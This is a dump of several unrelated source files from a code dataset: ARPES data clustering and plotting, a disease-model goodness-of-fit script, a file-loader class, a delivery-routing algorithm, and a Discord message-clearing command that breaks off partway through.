clean[x,y] = np.sum(data[x,y])\n return clean\n\ndef img_is_color(img):\n if len(img.shape) == 3:\n c1, c2, c3 = img[:, : , 0], img[:, :, 1], img[:, :, 2]\n if (c1 == c2).all() and (c2 == c3).all():\n return True\n return False\n\n\ndef show_image_list(list_images, list_titles=None, list_cmaps=None, grid=False, num_cols=3, figsize=(15, 9), title_fontsize=20):\n assert isinstance(list_images, list)\n assert len(list_images) > 0\n assert isinstance(list_images[0], np.ndarray)\n\n if list_titles is not None:\n assert isinstance(list_titles, list)\n assert len(list_images) == len(list_titles), '%d imgs != %d titles' % (len(list_images), len(list_titles))\n\n if list_cmaps is not None:\n assert isinstance(list_cmaps, list)\n assert len(list_images) == len(list_cmaps), '%d imgs != %d cmaps' % (len(list_images), len(list_cmaps))\n\n num_images = len(list_images)\n num_cols = min(num_images, num_cols)\n num_rows = int(num_images / num_cols) + (1 if num_images % num_cols != 0 else 0)\n\n # Create a grid of subplots.\n fig, axes = plt.subplots(num_rows, num_cols, figsize=figsize)\n \n # Create list of axes for easy iteration.\n if isinstance(axes, np.ndarray):\n list_axes = list(axes.flat)\n else:\n list_axes = [axes]\n\n for i in range(num_images):\n img = list_images[i]\n title = list_titles[i] if list_titles is not None else 'Image %d' % (i)\n cmap = list_cmaps[i] if list_cmaps is not None else (None if img_is_color(img) else 'gray')\n list_axes[i].imshow(img, cmap=cmap)\n list_axes[i].set_title(title, fontsize=title_fontsize) \n list_axes[i].grid(grid)\n list_axes[i].axis(\"off\")\n\n for i in range(num_images, len(list_axes)):\n list_axes[i].set_visible(False)\n\n fig.tight_layout()\n _ = plt.show()\n\n\n\n\n# creats a class of obejcts after applying K-means/PCA\nclass Clustered:\n def __init__(self, ARPES, fitted_model, raw_cords, dtype, percents): # ARPES is the ARPES_data object passed through\n self.ARPES = ARPES\n self.model = fitted_model\n self.labels = fitted_model.labels_\n self.centers = fitted_model.cluster_centers_\n self.cords = raw_cords\n self.dtype = dtype\n self.percents = percents\n\n def show(self, smooth = False, sampling = 1000, n_neighbors = 5):\n if smooth:\n values = self.ARPES.knn(self.labels, sampling, n_neighbors) \n else:\n values = np.reshape(self.labels, (self.ARPES.x_s, self.ARPES.y_s)).T\n ARPES_data.plot_graph(values,'X (mm)', 'Y (mm)', \\\n [self.ARPES.xmin, self.ARPES.xmax, self.ARPES.ymin, self.ARPES.ymax], interpolation= \"none\", \\\n cmap = 'YlOrRd', title = f'K-means clustering for {self.dtype}', \\\n pad = 15, cbar = False)\n\n\n def show_centers(self, encode = False, enhance = False):\n print(\"Finding representative points...\")\n closest, _ = pairwise_distances_argmin_min(self.centers, self.cords)\n print(\"Plotting...\")\n num_centers = len(self.centers)\n rows, cols = num_centers//3+1, 3\n fig = plt.figure(figsize=(10, 6))\n points = [(i%self.ARPES.x_s, i//self.ARPES.x_s) for i in closest]\n if encode:\n values = [cv2.resize(ARPES_data.get_decoding(self.ARPES.data[p[0], p[1]], enhance), (256,256)) for p in points]\n else:\n values = [cv2.resize(self.ARPES.data[p[0], p[1]], (256,256)) for p in points]\n titles = [f\"Cluster {c}\" for c in range(len(values))]\n show_image_list(values, titles, [\"magma\"]*len(titles))\n\n\n def show_double_cluster(self, cluster, enhance = False, line = True, epsilon = 0.4):\n points = []\n for n in range(len(self.labels)):\n if self.labels[n] == cluster:\n points.append([n%self.ARPES.x_s, n//self.ARPES.x_s])\n \n points = random.sample(points, 5)\n fig = plt.figure(figsize=(6, 10))\n fig.suptitle(f'Cluster {cluster}', fontsize=20)\n fig.subplots_adjust(top=1.1)\n\n grid = ImageGrid(fig, 111, \n nrows_ncols=(5, 2), # creates 2x2 grid of axes\n axes_pad=0.1, # pad between axes\n )\n \n for p in range(len(grid)//2):\n values = cv2.resize(self.ARPES.data[points[p][0], points[p][1]], (256,256))\n arped = ARPES_data.get_decoding(values, enhance)\n grid[2*p].imshow(arped, cmap = 'magma')\n if line:\n fermi = get_fermi(arped, epsilon)\n grid[2*p].axhline(y=fermi, color='red', alpha=0.5, linewidth=2)\n grid[2*p].axhline(y=fermi+43, color='green', alpha=0.3, linewidth=10)\n grid[2*p+1].imshow(values, cmap = 'magma')\n grid[2*p+1].grid(False)\n grid[2*p+1].axis('off')\n grid[2*p].grid(False)\n grid[2*p].axis('off')\n fig.tight_layout()\n fig.subplots_adjust(top=0.92)\n plt.show()\n plt.clf()\n\n def show_cluster(self, cluster, encode = False, enhance = False):\n print(f\"Getting cluster {cluster}...\")\n if cluster > len(self.centers)-1:\n print(\"Cluster is out of range.\")\n return None\n points = []\n for n in range(len(self.labels)):\n if self.labels[n] == cluster:\n points.append([n%self.ARPES.x_s, n//self.ARPES.x_s])\n \n points = random.sample(points, 15)\n fig = plt.figure(figsize=(6, 10))\n fig.suptitle(f'Cluster {cluster}', fontsize=12)\n fig.subplots_adjust(top=0.8)\n\n grid = ImageGrid(fig, 111, \n nrows_ncols=(5, 3), # creates 2x2 grid of axes\n axes_pad=0.1, # pad between axes\n )\n \n for p in range(len(grid)):\n if p < len(points):\n values = cv2.resize(self.ARPES.data[points[p][0], points[p][1]], (256,256))\n if encode:\n grid[p].imshow(ARPES_data.get_decoding(values, enhance), cmap = 'magma')\n else: \n grid[p].imshow(values, cmap = 'magma')\n\n grid[p].grid(False)\n grid[p].axis('off')\n\n fig.tight_layout()\n plt.show()\n plt.clf()\n\n\n\n def show_distribution(self, cmap='YlOrRd'):\n scatter_x, scatter_y = self.cords[:,:2].T\n percents = self.percents\n group = self.labels\n\n clr_range = np.linspace(0, 1, group.max()+1)\n\n fig, ax = plt.subplots()\n for g in np.unique(group):\n ix = np.where(group == g)\n ax.scatter(scatter_x[ix], scatter_y[ix], c = cm.get_cmap(cmap)(clr_range[g]),\\\n edgecolors='black', label = f'Cluster {g}', s = 100)\n ax.legend(frameon=True)\n print(f\"Accounting for {sum(percents[:2])} of varience.\")\n plt.xlabel(\"Principal Component 1\")\n plt.ylabel(\"Principal Component 2\") \n plt.show()\n\n \n\n def show_3d(self, cmap='YlOrRd', show_cent=False):\n scatter_x, scatter_y, scatter_z = self.cords[:,:3].T\n percents = self.percents\n group = self.labels\n\n clr_range = np.linspace(0, 1, group.max()+1)\n\n fig = plt.figure(figsize=(10, 8))\n ax = fig.add_subplot(projection='3d')\n\n\n for g in np.unique(group):\n ix = np.where(group == g)\n ax.scatter(scatter_x[ix], scatter_y[ix], scatter_z[ix], c = cm.get_cmap(cmap)(clr_range[g]),\\\n edgecolors='black', label = f'Cluster {g}', s = 100)\n \n ax.legend(frameon=True)\n ax.set_xlabel(\"Principal Component 1\", labelpad = 10.)\n ax.set_ylabel(\"Principal Component 2\", labelpad = 10.)\n ax.set_zlabel(\"Principal Component 3\", labelpad = 10.)\n\n\n if show_cent:\n ax2 = fig.add_subplot(111,frame_on=False) \n ax2.axis(\"off\")\n ax2.axis([0,1,0,1])\n\n # below solution from ImportanceOfBeingErnest on Github\n def proj(X, ax1, ax2):\n x,y,z = X\n x2, y2, _ = proj3d.proj_transform(x,y,z, ax1.get_proj())\n return ax2.transData.inverted().transform(ax1.transData.transform((x2, y2)))\n \n def image(ax,arr,xy):\n \"\"\" Place an image (arr) as annotation at position xy \"\"\"\n im = offsetbox.OffsetImage(arr, zoom=0.6)\n im.image.axes = ax\n ab = offsetbox.AnnotationBbox(im, xy, xybox=(0., -80.),\n xycoords='data', boxcoords=\"offset points\",\n pad=0.3, arrowprops=dict(arrowstyle='-|>', color='black'))\n ax.add_artist(ab)\n\n norm = lambda x : x/x.max()\n\n closest, _ = pairwise_distances_argmin_min(self.centers, self.cords)\n points = [(i%self.ARPES.x_s, i//self.ARPES.x_s) for i in closest]\n images = np.array([cv2.resize(self.ARPES.data[p[0], p[1]], (64,64)) for p in points])\n values = [cm.magma(norm(i)) for i in images] # all the images\n\n xs, ys, zs = np.array([self.cords[:, :3][c] for c in closest]).T\n\n\n for s in zip(xs,ys,zs, values):\n x,y = proj(s[:3], ax, ax2)\n image(ax2,s[3],[x,y])\n\n print(f\"Accounting for {sum(percents[:3])} of varience.\")\n plt.show()\n\n\n def get_accuracy(self, gt):\n assert len(gt.shape) == 2\n vals = []\n tests = list(permutations(range(int(gt.max())+1)))\n print(tests)\n labelswitch = np.zeros(gt.shape)\n x, y = gt.shape\n for label in tests:\n for i in range(x):\n for j in range(y):\n labelswitch[i,j] = label[int(np.reshape(self.labels, (30, 30), order = 'F')[i,j])]\n vals.append(np.count_nonzero(gt-labelswitch))\n return round(1-min(vals)/(x*y), 3)\n\n\n\n def PCA_on_autoencoder(self, bad_label = 0):\n pca_model = PCA(0.95)\n pca_model2 = PCA(0.95)\n cleaned_cords = []\n raw_cords = []\n for cord in range(len(self.labels)):\n if self.labels[cord] != bad_label:\n cleaned_cords.append(self.cords[cord])\n raw_cords.append(1)\n else:\n raw_cords.append(0)\n cc = np.array(cleaned_cords)\n t = ((pca_model2.fit_transform(cc)).T[0]).T\n final = []\n counter = 0\n for i in range(len(raw_cords)):\n if raw_cords[i] == 0:\n final.append(0)\n else:\n final.append(t[counter])\n counter += 1\n return np.array(final)\n \n def zerocount(self, bad_label, epsilon = 0.5):\n x_s = self.ARPES.x_s\n y_s = self.ARPES.y_s\n map = np.zeros((x_s,y_s))\n lab = np.reshape(self.labels, (x_s, y_s))\n for x in range(x_s):\n for y in range(y_s):\n if lab[x,y] != bad_label:\n map[x,y] = get_fermi(ARPES_data.get_decoding(self.ARPES.data[y,x], True), epsilon)\n else:\n map[x,y] = 0\n return map\n\n\n# create custom class for ARPES data\nclass ARPES_data:\n def __init__(self, data, xmin, xmax, ymin, ymax, KE_min, KE_max, \\\n Theta_min, Theta_max):\n self.data = data\n self.x_s, self.y_s, self.Ke_s, self.Ang_s = data.shape # also loads shape initially\n self.xmin = xmin\n self.xmax = xmax\n self.ymin = ymin\n self.ymax = ymax\n self.KE_min = KE_min\n self.KE_max = KE_max\n self.Theta_min = Theta_min\n self.Theta_max = Theta_max\n\n\n # enables the grabbing of data values by subscripting\n def __getitem__(self, key): \n return self.data[key]\n\n\n # makes default representation the raw data in matrix form\n def __repr__(self): \n return self.data\n\n\n # plot the data using this wrapper function (notes: everything follows ply, Autosqure automatically scales the thing)\n # specifaiclly used for matricies\n @staticmethod \n def plot_graph(values, xlabel, ylabel, ext, xbins=6, ybins=6, \\\n interpolation = \"lanczos\", aspect=1, cmap = \"magma\",\\\n title = \"\", pad = 0, Autosquare = False, cbar = True, show = True,\n axis = True): \n fig = plt.figure(figsize=(6, 6))\n print(\"Drawing graph...\")\n if Autosquare: # automatically make thing square\n aspect = (ext[1]-ext[0])/(ext[3]-ext[2])\n \n fig, ax = plt.subplots()\n plt.imshow(values, extent = ext, interpolation = interpolation, \\\n aspect=aspect, cmap = cmap)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel) \n plt.title(title, pad=pad) \n plt.grid(False)\n if not axis:\n plt.axis('off')\n if cbar:\n plt.colorbar()\n else: # create custom legend\n elements = []\n n_clusters = np.amax(values)+1\n clr_range = np.linspace(0, 1, n_clusters)\n for cluster in range(n_clusters):\n elements.append(Patch(label = f\"Cluster {cluster}\", facecolor = cm.get_cmap(cmap)(clr_range[cluster])))\n ax.legend(handles = elements, loc = 'lower right', bbox_to_anchor=(1.3, 0.4), frameon=True)\n if show:\n plt.show()\n plt.clf()\n\n # transform raw data to processable cv2 img (1-d array form when flattened)\n def clust_transform(self, img, dim =(256,256)):\n img = cv2.resize(img, dim) # create greyscale cv2 img\n img = np.reshape(img, (1,-1))[0] # create 1xn array\n return img\n\n # creates graph of the object integrated over all angles and energies\n def show(self, Interpolation=\"none\"): \n t_0 = time.time()\n print(\"Formating data for graph...\") # sum over all angles and values\n self.plot_graph(sum_all(self.x_s, self.y_s, self.data), 'X (mm)', 'Y (mm)', [self.xmin, self.xmax, self.ymin, self.ymax], interpolation = Interpolation)\n\n @staticmethod\n def get_encoding(img, enhance = False):\n if 'autoencoder_fitted' not in globals():\n print(\"Must fit autoencoder first.\")\n return None\n encoder = keras.Model(input_img, encoded)\n val = np.array([norm_ln(img)]) if enhance else np.array([norm(img)])\n return np.reshape(encoder.predict(val), (64,32))\n\n @staticmethod\n def get_batch(imgs, enhance = False):\n if 'autoencoder_fitted' not in globals():\n print(\"Must fit autoencoder first.\")\n return None\n encoder = keras.Model(input_img, encoded)\n val = norm_ln_batch(imgs) if enhance else norm_batch(imgs)\n val = np.array([np.reshape(n, (256,256, 1)) for n in val])\n return encoder.predict_on_batch(val)\n\n\n @staticmethod\n def get_decoding(img, enhance = False):\n if 'autoencoder_fitted' not in globals():\n print(\"Must fit autoencoder first.\")\n return None\n val = np.array([norm_ln(img)]) if enhance else np.array([norm(img)])\n return np.reshape(autoencoder.predict(val), (256,256))\n\n\n # shows deep-learning embedding\n def show_encoding(self, l_x, l_y):\n print(f\"Formating encoding for point ({l_x},{l_y})...\")\n graph = cv2.resize(self.get_encoding(self.data[l_x,l_y]), (256,256))\n self.plot_graph(graph,'', '', \\\n [0, 1, 0, 1], aspect = 1, \\\n title = f\"Cords: ({l_x},{l_y})\", pad = 15, axis = False,\n cmap = 'gray', interpolation = \"none\")\n\n def show_decoding(self, l_x, l_y, enhance = False):\n print(f\"Formating decoding for point ({l_x},{l_y})...\")\n decode = self.get_decoding(self.data[l_x,l_y], enhance = True)\n graph = cv2.resize(decode, (256,256))*255\n self.plot_graph(graph,'', '', \\\n [0, 1, 0, 1], aspect = 1, \\\n title = f\"Cords: ({l_x},{l_y})\", pad = 15, axis = False,\n cmap = 'gray', interpolation = \"none\")\n\n # plots angle-KE data at specific l_x l_y cord\n def show_point(self, l_x, l_y, mode = 'default'): \n print(f\"Formating data for point ({l_x},{l_y})...\")\n graph = self.data[l_x, l_y] # look at the l_x, l_y point of the data\n\n if mode=='ln': # ln compression if needed\n vlog = lambda i : log(i+1)\n mat_log = np.vectorize(vlog)\n graph = mat_log(graph)\n elif mode=='sqrt': # quadretic compression if needed\n vlog = lambda i : sqrt(i)\n mat_log = np.vectorize(vlog)\n graph = mat_log(graph)\n elif mode!='default': # check cases\n print('Mode must be \"default\", \"ln\", or \"sqrt\". Leave blank for default.')\n return None\n \n self.plot_graph(graph,'Theta (deg)', 'KE (eV)', \\\n [self.Theta_min, self.Theta_max, self.KE_min, self.KE_max], aspect = 40, \\\n title = f\"Cords: ({l_x},{l_y})\", pad = 15, Autosquare = True)\n\n\n # integrate along energy (returns angle-point-intensity graph)\n def integrate_energy(self): \n print(\"Integrating energy...\")\n graph = np.zeros((self.x_s*self.y_s, self.Ang_s))\n for x in range(self.x_s):\n for y in range(self.y_s):\n graph[self.x_s*y+x] = self.data[x,y].sum(0) # replace each row with compressed data row\n return graph\n\n\n # integrate along angle (returns energy-point-intensity graph)\n def integrate_angle(self): \n print(\"Integrating angle...\")\n graph = np.zeros((self.x_s*self.y_s, self.Ke_s))\n for x in range(self.x_s):\n for y in range(self.y_s):\n graph[self.x_s*y+x] = self.data[x,y].sum(1) # replace each row with compressed data row\n return graph\n\n # autoencoder over surface \n def autoencode(self, enhance=False):\n print(\"Autoencoding data...\")\n flat = np.concatenate(np.swapaxes(self.data, 0, 1))\n graph = np.reshape(self.get_batch(flat, enhance=enhance), (self.x_s * self.y_s, 2048))\n return graph\n\n # graph the energy data in terms of the indivisual points\n def show_energy(self): \n print(\"Formatting data for energy...\")\n graph = self.integrate_energy()\n self.plot_graph(graph, \"Angle (deg)\", \"Point\", \\\n ext = [self.Theta_min, self.Theta_max, 0, self.x_s*self.y_s], \\\n Autosquare = True, interpolation = \"none\")\n\n\n # graph the angle data in terms of the indiviusal points\n def show_angle(self): \n print(\"Formatting data for angle...\")\n graph = self.integrate_angle()\n self.plot_graph(graph, \"KE (eV)\", \"Point\", \\\n ext = [self.KE_min, self.KE_max, 0, self.x_s*self.y_s], \\\n Autosquare = True, interpolation= \"none\")\n \n # graph autoencoder distributions\n def show_autoencode(self, enhance=False):\n print(\"Formatting data for autoencoding...\")\n graph = self.autoencode(enhance)\n self.plot_graph(graph, \"\", \"Point\", \\\n ext = [0, 2048, 0, self.x_s*self.y_s], \\\n Autosquare = True, interpolation= \"none\", axis = False)\n\n\n # perform PCA dimentionality reduction\n def PCA(self, dim = (256,256), n_components = 0.95):\n t_i = time.time()\n print(\"Beginning PCA...\")\n model = PCA(n_components)\n values = np.zeros((self.x_s*self.y_s, dim[0]*dim[1]))\n for x in range(self.x_s):\n for y in range(self.y_s):\n values[x+y*self.x_s] = self.clust_transform(self.data[x,y], dim = dim)\n model.fit(values)\n print(f\"PCA reduction complete, took {round(time.time()-t_i, 2)} seconds.\")\n return model.transform(values), model.explained_variance_ratio_\n\n\n # kmeans\n def kmeans(self, dtype, n_clusters, dim = (256,256), n_components = 0.95, enhance = False): \n if dtype not in ['angle', 'energy', 'PCA', 'autoencoder']:\n print(\"type must be 'angle', 'energy', 'PCA', or 'autoencoder'.\")\n return None\n \n km = KMeans(n_clusters, n_init = 10, random_state = 100) # create kmeans\n \n if dtype == 'PCA':\n target, percents = self.PCA(dim, n_components)\n elif dtype == 'autoencoder':\n target = self.autoencode(enhance)\n percents = None\n else:\n target = self.integrate_angle() if dtype == 'angle' else self.integrate_energy()\n percents = None\n\n print(f\"Beginning kmeans clustering, type is {dtype}...\")\n t_i = time.time()\n vals = km.fit(target)\n print(f\"Kmeans clustering complete, took {round(time.time()-t_i, 2)} seconds.\")\n return Clustered(self, vals, target, dtype, percents)\n\n\n # knn-based smoothing\n def knn(self, results, sampling, n_neighbors): \n print(\"Begninning knn smoothing...\")\n t_i = time.time()\n c_product = lambda x,y : np.transpose([np.tile(x, len(y)), np.repeat(y, len(x))]) # cartesion product lambda function\n x_range, y_range = np.linspace(self.xmin, self.xmax, self.x_s), np.linspace(self.ymin, self.ymax, self.y_s)\n dataspace = c_product(x_range, y_range) # create grid of all known values\n clf = KNeighborsClassifier(n_neighbors, weights='distance')\n clf.fit(dataspace, results) # fit KNN model: first term is location, second term is type\n xx, yy = np.meshgrid(np.linspace(self.xmin, self.xmax, sampling),\\\n np.linspace(self.ymin, self.ymax, sampling))\n Z = clf.predict(np.c_[xx.ravel(), yy.ravel()]) # start sampling the created space using the KNN alg\n Z = Z.reshape(xx.shape)\n print(f\"Knn smoothing complete, took {round(time.time()-t_i,2)} seconds.\")\n return Z.T\n\n\n # wrapper to print object\n def show_kmeans(self, dtype, n_clusters, smooth=False, sampling=2000, n_neighbors = 5, Autosquare = True, enhance = False):\n results = self.kmeans(dtype, n_clusters, enhance = enhance).labels\n if smooth:\n graph = self.knn(results, sampling, n_neighbors) # extrapolate in-between values using knn alg. above\n else:\n graph = np.reshape(results, (self.x_s, self.y_s), order='F') # return linearly ordered data to 2-d graph\n \n self.plot_graph(graph,'X (mm)', 'Y (mm)', \\\n [self.xmin, self.xmax, self.ymin, self.ymax], interpolation= \"none\", \\\n cmap = 'YlOrRd', title = f'K-means clustering for {dtype}', \\\n pad = 15, cbar = False, Autosquare = Autosquare)\n\n # visialiezer for the elbow method via yellowbrick\n def elbow(self,dtype,range=(3,8), dim=(256,256), n_components=0.95, enhance=False): \n print(f\"Visualising elbow method for '{dtype}'...\")\n model = KMeans()\n if dtype not in ['angle', 'energy', 'PCA', 'autoencoder']:\n print(\"type must be 'angle', 'energy', 'autoencoder', or 'PCA'\")\n return None\n\n if dtype == 'PCA':\n target, _ = self.PCA(dim, n_components)\n elif dtype == 'autoencoder':\n target = self.autoencode(enhance)\n else:\n target = self.integrate_angle() if dtype == 'angle' else self.integrate_energy()\n visualizer = KElbowVisualizer(model, k=range)\n visualizer.fit(target)\n visualizer.show() \n\n\n def silhouette(self,dtype,range=(3,8), dim=(256,256), n_components=0.95, enhance = False): \n print(f\"Visualising elbow method for '{dtype}'...\")\n model = KMeans()\n if dtype not in ['angle', 'energy', 'PCA', 'autoencoder']:\n print(\"type must be 'angle', 'energy', or 'PCA'\")\n return None\n\n if dtype == 'PCA':\n target, _ = self.PCA(dim, n_components)\n elif dtype == 'autoencoder':\n target = self.autoencode(enhance)\n else:\n target = self.integrate_angle() if dtype == 'angle' else self.integrate_energy()\n visualizer = SilhouetteVisualizer(model, colors='yellowbrick')\n visualizer.fit(target)\n visualizer.show() \n","repo_name":"therealericsun/deeparpes","sub_path":"main/structures.py","file_name":"structures.py","file_ext":"py","file_size_in_byte":23211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9471771759","text":"import os\nimport pandas as pd\nimport reduced_model as comm\nimport numpy as np\nimport scipy.stats as stats\nimport reduced_mcmc as red_mcmc\n\n\"\"\"\nRun goodness of fit tests for best fit models on observed Bd prevalence and\nintensity.\n\n\"\"\"\n# Set up file paths\nhome_path = os.path.expanduser(\"~\")\ndata_dir = os.path.join(\"..\", \"data\")\nbase_temp_path = os.path.join(data_dir,\n \"temperature_data\",\n \"historical_temperature_data\")\ntemperature_path = os.path.join(data_dir,\n \"temperature_data\",\n \"measured_temperature_data\")\n\nif __name__ == '__main__':\n\n # Set preliminary parameters\n\n # Site by species dict\n spp_dict = {'PA': 'LIPI', 'VT': 'LIPI', 'LA': \"LISP\", 'TN': 'LISP'}\n\n # Best fit models for each location\n models = {'PA': 'a_temp', 'VT': 'a_temp',\n 'TN': 'a_temp', 'LA': 'both_model'}\n load_dependent_loss = True # All best models have load-dependent loss\n\n rsq_ests = {}\n percent_pvals = {}\n for dod_location in ['VT', 'PA', \"TN\", 'LA']:\n\n # Extract model fits\n res = pd.read_pickle(\"../results/pickled_results/{0}_{2}_{1}_allsites_ext_beta_prior_K=8_loss_load_omega=1.pkl\".format(dod_location, spp_dict[dod_location], models[dod_location]))\n spps = res['species']\n site_numbers = res['sites']\n adapt = res['adapt_param']\n est_params = res['parameters']\n chains = res['chains']\n mcmc_res = res['mcmc_results']\n base_params = res['base_params']\n\n # Set simulation parameters\n model_params = {'time_step': 7, 'mean_temp': 15}\n initial_densities = {spp: np.array([0, 1.0, 1.0, 1.0]) for spp in spps}\n comm_site_params = [{} for i in range(len(site_numbers))]\n site_areas = [1.0 for site in site_numbers]\n start_date = pd.datetime(2016, 1, 1)\n steps = 201\n\n # Set up data for simulation and goodness of fit\n datapath = os.path.join(data_dir, \"leopard_frog_data.csv\")\n fulldat = red_mcmc.load_and_format_data(datapath, exclude=None)\n dod_dat = fulldat[(fulldat.DOD_location == dod_location) &\n (fulldat.Site_code.isin(site_numbers))]\n obs_dat = dod_dat[['Site_code', 'Species_code', 'Date', 'Bd_pos', 'Bd_load']]\n sppsite_dats = [{spp: (obs_dat.query(\"Site_code == {0} and Species_code == '{1}'\".format(sitenum, spp))\n .assign(date=lambda x: pd.to_datetime(x.Date))\n .sort_values(by=['date'])\n .reset_index(drop=True)) for spp in spps}\n for sitenum in site_numbers]\n\n # Extract temperature data\n temp_data, base_dat, longterm = red_mcmc.get_temp_data(dod_location,\n average_sites=False)\n\n # 1. Get median parameter estimates\n est_spp_params = {}\n sims = 1\n for spp in spps:\n\n ndarray = np.array([mcmc_res[i]['params'][spp][:, 5*adapt:].T for i in range(chains)])\n num_samp = ndarray.shape[1]\n samp_params = []\n\n # Extract median parameters for prediction\n for num in range(sims):\n\n mean_params = np.median(ndarray, axis=(0, 1))\n samp_params.append({ep: mean_params[i]\n for i, ep in enumerate(est_params)})\n\n est_spp_params[spp] = samp_params\n\n # 2. Simulate the model\n z_fxn = comm.zsurv_fxn(model_params['time_step'])\n sim_res_site = []\n for s, site in enumerate(site_numbers):\n\n # Get temperature functions\n temp_fxns = red_mcmc.build_temperature_fxn(temp_data, base_dat, longterm, site,\n start_date)\n temp_fxn, temp_fxn_cv, temp_fxn_mm = temp_fxns\n\n all_sim_res = []\n for sim_num in range(sims):\n\n params = {}\n for spp in spps:\n\n tparams = base_params[spp].copy()\n tparams.update(est_spp_params[spp][sim_num])\n params[spp] = tparams\n\n sim_res = red_mcmc.run_model(params, z_fxn, temp_fxn, temp_fxn_cv,\n temp_fxn_mm, initial_densities, model_params,\n steps, site_areas[s], comm_site_params[s],\n load_dependent_loss, start_date)\n all_sim_res.append(sim_res)\n\n sim_res_site.append(all_sim_res)\n\n # 3. Compute goodness of fit\n gof_dt = []\n for s in range(len(site_numbers)):\n for j in range(sims):\n\n odat = sppsite_dats[s][spps[0]]\n simdat = sim_res_site[s][j][spps[0]]\n data = pd.merge_asof(odat, simdat, direction=\"nearest\", on='date')\n gof_dt.append(data)\n\n gof_dt = pd.concat(gof_dt)\n\n # Compute R2 using formula from Gelman et al. 2017\n ind = gof_dt.Bd_load > 0\n rsq_dt = gof_dt[ind]\n obs = np.log(rsq_dt.Bd_load.values)\n pred = rsq_dt.mean_load.values\n v_pred = np.var(pred)\n v_resid = np.var((obs - pred))\n rsq_alt = (v_pred) / (v_pred + v_resid)\n\n # R2 results\n rsq_ests[dod_location] = rsq_alt\n\n # Calculate the number of instances where the observed prevalence\n # is significantly different than predicted prevalence at alpha = 0.05\n # corrected for multiple comparisons.\n gof_dt = gof_dt.assign(month=lambda x: x.date.dt.month,\n year=lambda x: x.date.dt.year)\n\n def my_group(x):\n\n names = {'pred_prev': x.prev.mean(),\n 'n': len(x),\n 'inf': np.sum(x.Bd_pos == 1)}\n return(pd.Series(names, index=['pred_prev', 'n', 'inf']))\n\n df = gof_dt.groupby(['Site_code', 'date']).apply(my_group).reset_index()\n\n # Get p-values from binomial test\n pvals = np.array([stats.binom_test(df.inf.values[i],\n n=df.n.values[i],\n p=df.pred_prev.values[i])\n for i in range(df.shape[0])])\n\n # Only compare values with 5 or samples so we have some power to detect\n # differences\n pvals = pvals[df.n.values >= 5]\n\n # Use Bonferonni correction\n alpha = 0.05 # Type I error rate\n percent_sig = np.sum(pvals < (alpha / len(pvals))) / len(pvals)\n\n # Prevalence results\n percent_pvals[dod_location] = (percent_sig, len(pvals))\n\n\n","repo_name":"mqwilber/bd_seasonality","sub_path":"code/goodness_of_fit.py","file_name":"goodness_of_fit.py","file_ext":"py","file_size_in_byte":6793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28235124132","text":"# -*- coding: utf-8 -*-\n# @Time : 2023/6/12-11:39\n# @Author : 灯下客\n# @Email : \n# @File : file_loader.py\n# @Software: PyCharm\nimport os\n\nfiles_cached = {}\n\n\nclass FileLoader(object):\n default_file = None\n file_env_location = None\n path = None\n\n def __init__(self, path, default_filename):\n self.path = path\n self.default_file = default_filename\n\n def get_file(self, path=None, fn=None):\n if path is None:\n path = self.path\n if os.path.isdir(path):\n path = os.path.join(path, self.default_file)\n return self._get_conf_from_file(path, fn)\n\n def put_file(self, path, content, mode=\"w\"):\n file_to_write = open(path, mode)\n file_to_write.write(content) # The key is type bytes still\n file_to_write.close()\n\n def _get_conf_from_file(self, path, fn=None):\n if path and os.path.isdir(path):\n path = os.path.join(path, self.default_file)\n\n if not path or not os.path.isfile(path):\n return {}\n if path not in files_cached:\n self.path = path\n if fn:\n files_cached[path] = fn(path)\n else:\n file_to_read = open(path, \"rb\")\n content = file_to_read.read() # The key will be type bytes\n file_to_read.close()\n files_cached[path] = content\n return files_cached[path]\n","repo_name":"cookieGeGe/py_easy_config","sub_path":"easy_config_py/file_loader.py","file_name":"file_loader.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38968837635","text":"# https://chaemi720.tistory.com/153\n\ndef solution(N, road, K):\n # 마을 간 걸리는 시간 2차원 행렬로 정리 \n path = [[0]*(N+1) for _ in range(N+1)]\n for r in road:\n # 아직 도로가 없다면 추가\n if path[r[0]][r[1]] == 0:\n path[r[0]][r[1]] = r[2]\n path[r[1]][r[0]] = r[2]\n # 도로가 있다면 걸리는 시간이 더 적은 도로를 남기기\n else:\n path[r[0]][r[1]] = min(path[r[0]][r[1]],r[2])\n path[r[1]][r[0]] = path[r[0]][r[1]]\n\n # 걸리는 시간\n time = [0]*(N+1)\n # 1번 마을은 항상 가능하니 숫자 10\n time[1] = 10\n q = [1]\n while q:\n now = q.pop(0)\n for idx,i in enumerate(path[now]):\n # 도로가 있고 K시간 이하 배달 가능이면 (1번 마을 도착을 10으로 둬서 K아니고 K+10으로 계산하기)\n if i and time[now] + i <= K+10:\n # 이미 도착한 적이 있다면 이전 방법과 지금 방법의 시간 비교 -> 더 적게 걸린 시간 남기기\n if time[idx]:\n if time[now]+i < time[idx]:\n time[idx] = time[now] + i\n q.append(idx)\n # 도착한 적 없으면 \n else:\n time[idx] = time[now] + i\n q.append(idx) \n # 도착한 시간이 적힌 마을 세기(도착한 시간이 0이면 도착 못 한 마을)\n return N+1-time.count(0)","repo_name":"chaemj97/Algorithm","sub_path":"2022년/6월/0608_pro_배달.py","file_name":"0608_pro_배달.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42270180485","text":"from discord.commands import slash_command, Option\nfrom discord.ext import commands\nfrom sdb_lib import Config, Messages, success_embed, error_embed\n\n\nclass Clear(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @slash_command(\n name = \"clear\",\n description = \"Clears a number of messages\",\n guild_ids = Config.guild_ids\n )\n @commands.has_permissions(manage_messages = True)\n @commands.bot_has_permissions(manage_messages = True)\n async def clear(\n self, ctx,\n amount: Option(int, \"messages\", min_value = 1)\n ):\n if amount <= 0:\n return await ctx.respond(embed = error_embed(Messages.clear_invalid_argument.replace(\"{}\", str(amount))), ephemeral = True)\n\n try:\n await ctx.channel.purge(limit = amount)\n await ctx.respond(embed = success_embed(Messages.clear_success.replace(\"{}\", str(amount))), ephemeral = True)\n except Exception:\n await ctx.respond(embed = 